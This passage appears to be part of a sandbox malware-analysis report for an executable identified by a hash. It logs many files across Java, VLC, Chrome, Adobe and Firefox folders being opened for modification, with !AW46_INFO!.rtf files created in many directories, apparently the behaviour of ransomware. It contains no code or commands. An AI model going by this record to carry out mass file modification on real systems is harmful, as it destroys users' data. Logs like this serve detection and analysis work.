(x86)\Google\Chrome\Application\SetupMetrics\20200616092334.pma 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fr.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+6 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Taipei 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\drive.crx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\policytool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Saipan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\cmm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoBeta.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\security\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\en-US\Journal.exe.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Curacao 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-io.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Athens 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\LICENSE 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Music.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\Welcome.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Memo.jtp 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\ApproveGrant.cmd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program 